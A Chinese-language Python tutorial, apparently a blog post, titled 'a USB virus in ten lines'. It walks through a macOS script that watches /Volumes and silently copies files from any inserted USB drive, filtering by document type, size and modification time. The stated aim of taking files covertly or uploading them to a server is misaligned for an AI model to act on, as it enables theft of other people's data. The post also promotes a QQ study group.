標籤:軟體 python開發 不能 ati 重要 諮詢 cimage 拷貝 byte
昨天在上廁所的時候突發奇想,當你把usb插進去的時候,能不能自動執行usb上的程式。查了一下,發現只有windows上可以,具體的大家也可以搜尋(搜尋關鍵詞usb autorun)到。但是,如果我想,比如,當一個usb插入時,在後台自動把usb裡的重要檔案神不知鬼不覺地拷貝到本地或者上傳到某個伺服器,就需要特殊的軟體輔助。
於是我心想,能不能用python寫一個程式,讓它在後台運行。每當有u盤插入的時候,就自動拷貝其中重要檔案。
如何判斷隨身碟的插入與否?
首先我們開啟電腦終端,進入/Volumes目錄,這時候插入隨身碟,可以發現它被掛載在了這個目錄之下,也就是說,我們只要在固定時間掃描這個目錄,當這個目錄有新檔案夾出現的時候,很可能有隨身碟被插入了。
我的設計是這樣的,用time.sleep(3)函數,讓程式保持運行狀態,並且每隔三秒查看一下/Volumes/目錄,如果多出來檔案夾,就將其拷貝到另外的檔案夾。
# encoding=utf-8from time import sleepimport os, shutilusb_path = "/Volumes/"content = os.listdir(usb_path) # os.listdir(路徑)返迴路徑下所有檔案以及檔案夾的名稱while True: new_content = os.listdir(usb_path) #每隔三秒掃描一次/Volumes/ if new_content != content: # 如果發現異常,即多出一個檔案夾,則退出 break; sleep(3)x = [item for item in new_content if item not in content]# 找到那個新檔案夾,返回包括新檔案夾string類型名稱的列表,這個表達方法很pythonicshutil.copytree(os.path.join(usb_path, x[0]), ‘/Users/home/usb_copy‘)# shutil.copytree 把目錄下所有東西一股腦複製進/Users/home/usb_copy, # 放進了自己的home目錄下
就像標題所示,我們真的只用了10行(其實是11行,湊個整:)完成了這個“病毒”。我們可以發現usb中的目錄,在插入半分鐘後全部躺在了home目錄下了。
如何選擇性的複製檔案?
剛剛我們寫了一個很簡易的指令碼測試了一下這個想法的可行性,但是還是有問題。剛才之所以能把隨身碟中所有檔案很快複製進去,是因為隨身碟中只有兩三個檔案,大小不超過15M。如果目標隨身碟中有很多電影,音樂,這些我們並不需要的檔案,我們的程式就應該能跳過它們,僅僅選擇一些重要的比如.docx比如.ppt檔案,或者僅僅複製最近修改過的那些檔案,或者排除所有大小大於5M的檔案。我們可以用python做到嗎?當然!
os.walk 遞迴檔案夾中所有檔案
Python os.walk() 的使用方法可以諮詢我來擷取
還是舉個例子吧。
我在某目錄下建立了testwalk檔案夾,裡面有file123.txt三個檔案,folder123三個檔案夾,其中folder1中有檔案file4.txt以及folder4
? testwalk touch file1.txt file2.txt file3.txt? testwalk mkdir folder1 folder2 folder3? testwalk cd folder1? folder1 touch file4.txt && mkdir folder4? folder1 cd ..# 上面建立了這些檔案以及檔案夾,你也可以在圖形介面上建立# tree 是個很好玩的命令,可以直觀地顯示檔案路徑? testwalk tree ./testwalk/├── file1.txt├── file2.txt├── file3.txt├── folder1│ ├── file4.txt│ └── folder4├── folder2└── folder34 directories, 4 files
現在我們來測試一下
import osfor root, dirs, files in os.walk("./testwalk/"): for name in files: print(os.path.join(root, name)) for name in dirs: print(os.path.join(root, name))-----------------------------------------------------------------------------運行結果:./testwalk/folder1/file4.txt./testwalk/folder1/folder4./testwalk/file2.txt./testwalk/file3.txt./testwalk/file1.txt./testwalk/folder2./testwalk/folder3./testwalk/folder1
root存放的是當前位置,它會把./testwalk/下所有的檔案夾作為根目錄,往下搜尋
for root, dirs, files in os.walk("./testwalk/", topdown=False): print(root)./testwalk/folder2./testwalk/folder3./testwalk/folder1/folder4./testwalk/folder1./testwalk/
單獨查看 dirs
for root, dirs, files in os.walk("./testwalk/"): for name in dirs: print(os.path.join(root, name))./testwalk/folder2./testwalk/folder3./testwalk/folder1./testwalk/folder1/folder4
單獨查看 files
for root, dirs, files in os.walk("./testwalk/", topdown=False): for name in files: print(os.path.join(root, name))./testwalk/file2.txt./testwalk/file3.txt./testwalk/file1.txt./testwalk/folder1/file4.txt
好了,我們現在需要遞迴usb檔案夾,找到所有的file,查看大小,如果小於,比如3M,就拷貝進home,大於就捨去。
??在這裡還是要推薦下我自己建的Python開發學習群:725479218,群裡都是學Python開發的,如果你正在學習Python ,小編歡迎你加入,大家都是軟體開發黨,不定期分享乾貨(只有Python軟體開發相關的),包括我自己整理的一份2018最新的Python進階資料和進階開發教程,歡迎進階中和進想深入Python的小夥伴
shutil模組
import shutil>>> help(shutil)>>> dir(shutil)[‘Error‘, ‘ExecError‘, ‘SpecialFileError‘, ‘WindowsError‘, ‘_ARCHIVE_FORMATS‘, ‘_BZ2_SUPPORTED‘, ‘_ZLIB_SUPPORTED‘, ‘__all__‘, ‘__builtins__‘, ‘__doc__‘, ‘__file__‘, ‘__name__‘, ‘__package__‘, ‘_basename‘, ‘_call_external_zip‘, ‘_destinsrc‘, ‘_get_gid‘, ‘_get_uid‘, ‘_make_tarball‘, ‘_make_zipfile‘, ‘_samefile‘, ‘abspath‘, ‘collections‘, ‘copy‘, ‘copy2‘, ‘copyfile‘, ‘copyfileobj‘, ‘copymode‘, ‘copystat‘, ‘copytree‘, ‘errno‘, ‘fnmatch‘, ‘get_archive_formats‘, ‘getgrnam‘, ‘getpwnam‘, ‘ignore_patterns‘, ‘make_archive‘, ‘move‘, ‘os‘, ‘register_archive_format‘, ‘rmtree‘, ‘stat‘, ‘sys‘, ‘unregister_archive_format‘]
好吧,看不懂,還是得看官方文檔。
現在我們拿剛才的檔案夾舉例子,如果想把file1.txt拷貝到folder2:
>>> shutil.copy2(‘./file1.txt‘, ‘./folder2‘)------------------------------------------------我是分割線-----------? folder2 lsfile1.txt
還有許多使用工具在shutil裡面這裡就不詳述了。
os.path.getsize()判斷大小
os.path.getsize(檔案名稱)返回的是一個單位為byte的數值,如果用來查看檔案大小,我們則需要手動寫一個函數,將其換算成容易閱讀的形式。
movie = /Users/home/somemovie.rmvbdef convert_bytes(num):# this function will convert bytes to MB.... GB... etc for x in [‘bytes‘, ‘KB‘, ‘MB‘, ‘GB‘, ‘TB‘]: if num < 1024.0: return "%3.1f %s" % (num, x) num /= 1024.0def getDocSize(path): try: size = os.path.getsize(path) return size except Exception as err: print(err)print(convert_bytes(getDocSize(movie)))
結果:
1.3 GB
[Finished in 0.1s]
這裡我們只要選擇檔案大小小於3M的即可,3M = 3 * 1024kB = 3 * 1024*1024byte
for root, dirs, files in os.walk(os.path.join(usb_path, x[0])): #MyUSB location for name in files: file = os.path.join(root, name) if os.path.getsize(file) < 3*1024*1024: shutil.copy2(file, target_folder)
結合shutil.copy2就可以把選定大小的檔案複製進我們的目標檔案夾了
如何指定檔案類型
這裡就需要Regex來協助我們了。
Regex內容很多,《python核心編程》中用了整整一章來講,所以我們也不深入了。下面是官方文檔,感興趣的可以看一下。
7.2. re - Regular expression operations - Python 2.7.14 documentation
如下,我們讓指定檔案尾碼以及指定檔案大小可以複製進我們的目標檔案:
別忘了匯入 re
import re...regex_filename = re.compile(‘(.*zip$)|(.*rar$)|(.*docx$)|(.*ppt$)|(.*xls$)‘)for root, dirs, files in os.walk(os.path.join(usb_path, x[0])): #MyUSB location for name in files: file = os.path.join(root, name) if regex_filename.match(file) and os.path.getsize(file) < 1024*1024: shutil.copy2(file, target_folder)
用更加複雜的Regex可以更好地指定檔案類型
根據修改時間篩選檔案
>>> from os.path import *>>> help(getmtime)getmtime(filename) Return the last modification time of a file, reported by os.stat().>>> help(getctime)getctime(filename) Return the metadata change time of a file, reported by os.stat().
這時候我在目錄下建立了一個檔案叫做newfile
>>> getctime("newfile")1522746383.716875# 我們可以看到返回的time是從某個時間到現在的秒數,如需閱讀,我們需要time.ctime來轉換>>> import time>>> time.ctime(1522746383.716875)‘Tue Apr 3 17:06:23 2018‘ # 這就是剛才建立的時間啦>>> help(time.ctime)ctime(...) # 查看文檔 ctime(seconds) -> string Convert a time in seconds since the Epoch to a string in local time. This is equivalent to asctime(localtime(seconds)). When the time tuple is not present, current time as returned by localtime() is used.
總之,對每一個檔案進行修改時間的篩選可以只複製那些近期,或者特定時期修改或者添加過的檔案,這個功能在特定情況下很有用。
總結
其實,標題這麼起只是為了吸引大家注意,這就是一個小程式,也談不上病毒。我更想通過這個例子,展示python對於檔案處理的強大能力,引發大家的學習熱情。以上實現都是基於macos,linux應該一樣,windows稍加修改也可以成功。
十行代碼--用python寫一個USB病毒 (知乎 DeepWeaver)